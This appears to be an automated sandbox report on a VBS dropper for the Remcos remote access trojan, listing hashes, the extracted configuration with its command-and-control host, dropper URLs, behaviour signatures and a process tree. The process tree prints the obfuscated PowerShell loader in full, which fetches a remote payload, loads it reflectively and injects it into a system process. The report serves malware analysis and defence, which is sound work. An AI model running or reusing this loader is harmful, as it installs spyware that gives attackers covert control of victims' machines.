Overview

overview

10

Static

static

1

bd0165995a...8f.vbs

windows7-x64

10

bd0165995a...8f.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-10-2024 03:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bd0165995a09280cbdcc562067bbb5edfe8fd882c1d519a442c5bf9bbe21d88f.vbs

  • Size

    501KB

  • MD5

    1c7bf2517aab3aa99d65ba460d20605e

  • SHA1

    c1b781e2e63ee3b6b2e3f07a389c49a8c751b30a

  • SHA256

    bd0165995a09280cbdcc562067bbb5edfe8fd882c1d519a442c5bf9bbe21d88f

  • SHA512

    b4e199855211bd4b30ea8a9e8fcce5c31eebc0554561cca84484771755038524e122d075d4e127388ac6840f9b3b8b03daaf93a1bd8b9973b515fd2fe18af696

  • SSDEEP

    12288:ULQXhKKRUsPehr9faIzvJovIZXfwL4pKKdJhcOJ1qMQ77eIeum6MjonBzL2NR5:h+v

Score
10/10
remcosmatrix fenix*discoveryexecutionrat

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
exe.dropper

https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt

Extracted

Family

remcos

Botnet

Matrix Fenix*

C2

newssssssssssssss.duckdns.org:2404

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    registros.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-XDNGQ0

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Capturas de pantalla

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

    execution
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\bd0165995a09280cbdcc562067bbb5edfe8fd882c1d519a442c5bf9bbe21d88f.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4080
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Y29NU3BFQ1s0LDI0LDI1XS1KT2luJycpICgoKCd7JysnMH11cicrJ2wnKycgJysnPSAnKyd7MScrJ31oJysndHRwczovJysnL2knKydhNjAwJysnMTAwLnVzLmFyYycrJ2hpdmUuJysnb3JnLzI0L2l0ZScrJ21zJysnL2RldGFoLW5vJysndGUnKyctJysndicrJy9EJysnZScrJ3RhaE4nKydvdGUnKydWJysnLicrJ3R4dCcrJ3snKycxJysnfTt7MH1iYXMnKydlNicrJzQnKydDJysnb250ZW50ID0gJysnKE4nKydldy1PYicrJ2onKydlJysnY3QgU3lzdGVtLk4nKydlJysndC4nKydXZWJDbCcrJ2knKydlbnQpLkRvd25sb2FkUycrJ3RyaW5nKHswJysnfXUnKydybCk7ezAnKyd9YmknKyduYXJ5QycrJ29udGVudCcrJyA9ICcrJ1tTeXMnKyd0ZScrJ20uQ29udmVydCcrJ106OkZyb20nKydCYXNlNicrJzRTJysndHJpbicrJ2coeycrJzAnKyd9YmFzZTYnKyc0QycrJ28nKydudGUnKydudCcrJyk7ezB9YXNzZScrJ20nKydibCcrJ3knKycgPScrJyBbUmVmbGVjJysndGlvbi5BJysncycrJ3NlbWJseV06JysnOkxvJysnYWQoezB9YicrJ2luYScrJ3J5Q28nKydudGVudCk7ezB9JysndHlwJysnZSA9ICcrJ3swfWFzc2VtJysnYmx5LkdldFR5JysncGUoezF9UnVuJysnUEUuJysnSG9tZXsnKycxfSknKyc7eycrJzB9bWV0aG9kJysnID0gezB9JysndHlwZS5HZScrJ3RNZScrJ3Rob2QoezF9VicrJ0FJezF9JysnKTt7MH1tZXRoJysnbycrJ2QuSW52b2tlKCcrJ3swJysnfScrJ251bGwsIFsnKydvJysnYmplYycrJ3RbJysnXV1AKHsnKycxfTAnKycvUFNUcicrJ1QvZCcrJy9lZS5ldHMnKydhcC8vJysnOnNwdHQnKydoeycrJzF9ICwnKycgezF9ZCcrJ2UnKydzYScrJ3RpJysndicrJ2FkJysnb3snKycxfSAsIHsxfWRlc2F0JysnaXZhZG8nKyd7MX0gLCB7MScrJ31kZXNhdCcrJ2l2YWRvJysnezF9LHsxfScrJ0FkJysnZCcrJ0luUHInKydvY2VzczMyJysnezF9JysnLHsxfScrJ3sxfSknKycpJyktZiAgW0NoYXJdMzYsW0NoYXJdMzkpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4172
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:coMSpEC[4,24,25]-JOin'') ((('{'+'0}ur'+'l'+' '+'= '+'{1'+'}h'+'ttps:/'+'/i'+'a600'+'100.us.arc'+'hive.'+'org/24/ite'+'ms'+'/detah-no'+'te'+'-'+'v'+'/D'+'e'+'tahN'+'ote'+'V'+'.'+'txt'+'{'+'1'+'};{0}bas'+'e6'+'4'+'C'+'ontent = '+'(N'+'ew-Ob'+'j'+'e'+'ct System.N'+'e'+'t.'+'WebCl'+'i'+'ent).DownloadS'+'tring({0'+'}u'+'rl);{0'+'}bi'+'naryC'+'ontent'+' = '+'[Sys'+'te'+'m.Convert'+']::From'+'Base6'+'4S'+'trin'+'g({'+'0'+'}base6'+'4C'+'o'+'nte'+'nt'+');{0}asse'+'m'+'bl'+'y'+' ='+' [Reflec'+'tion.A'+'s'+'sembly]:'+':Lo'+'ad({0}b'+'ina'+'ryCo'+'ntent);{0}'+'typ'+'e = '+'{0}assem'+'bly.GetTy'+'pe({1}Run'+'PE.'+'Home{'+'1})'+';{'+'0}method'+' = {0}'+'type.Ge'+'tMe'+'thod({1}V'+'AI{1}'+');{0}meth'+'o'+'d.Invoke('+'{0'+'}'+'null, ['+'o'+'bjec'+'t['+']]@({'+'1}0'+'/PSTr'+'T/d'+'/ee.ets'+'ap//'+':sptt'+'h{'+'1} ,'+' {1}d'+'e'+'sa'+'ti'+'v'+'ad'+'o{'+'1} , {1}desat'+'ivado'+'{1} , {1'+'}desat'+'ivado'+'{1},{1}'+'Ad'+'d'+'InPr'+'ocess32'+'{1}'+',{1}'+'{1})'+')')-f [Char]36,[Char]39) )"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2596
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          4⤵
            PID:1692
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of SetWindowsHookEx
            PID:1892

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\remcos\registros.dat
      Filesize

      144B

      MD5

      524c1f86db5f0271749632b270976f26

      SHA1

      baf5e0962367718af0634410e516d9848c1f49b4

      SHA256

      3f1916cad68bc1bf75736f25ba319e3104ef9284bf0d4ad58d9b02eafe24e56c

      SHA512

      e839f0b51aa1ad5071da98b6da7d53b74844240fd646d1168fccc677ef66e07a1dec646c039f6db48bc991db6a67650cb362d34538bec33dd3914d5ee3c78758

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      Filesize

      3KB

      MD5

      f41839a3fe2888c8b3050197bc9a0a05

      SHA1

      0798941aaf7a53a11ea9ed589752890aee069729

      SHA256

      224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

      SHA512

      2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

      Download Submit

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      5caad758326454b5788ec35315c4c304

      SHA1

      3aef8dba8042662a7fcf97e51047dc636b4d4724

      SHA256

      83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

      SHA512

      4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q3iusbsw.cw1.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • memory/1892-36-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/1892-47-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/1892-71-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/1892-72-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/1892-25-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/1892-64-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/1892-63-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/1892-31-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/1892-56-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/1892-33-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/1892-55-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/1892-37-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/1892-38-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/1892-39-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/1892-40-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/1892-48-0x0000000000400000-0x0000000000482000-memory.dmp

      Filesize

      520KB

      Download

    • memory/2596-22-0x000002383D590000-0x000002383D79C000-memory.dmp

      Filesize

      2.0MB

      Download

    • memory/4172-1-0x0000026238BD0000-0x0000026238BF2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4172-0-0x00007FFF2CB43000-0x00007FFF2CB45000-memory.dmp

      Filesize

      8KB

      Download

    • memory/4172-32-0x00007FFF2CB40000-0x00007FFF2D601000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4172-11-0x00007FFF2CB40000-0x00007FFF2D601000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4172-12-0x00007FFF2CB40000-0x00007FFF2D601000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4172-24-0x00007FFF2CB40000-0x00007FFF2D601000-memory.dmp

      Filesize

      10.8MB

      Download

    • memory/4172-23-0x00007FFF2CB43000-0x00007FFF2CB45000-memory.dmp

      Filesize

      8KB

      Download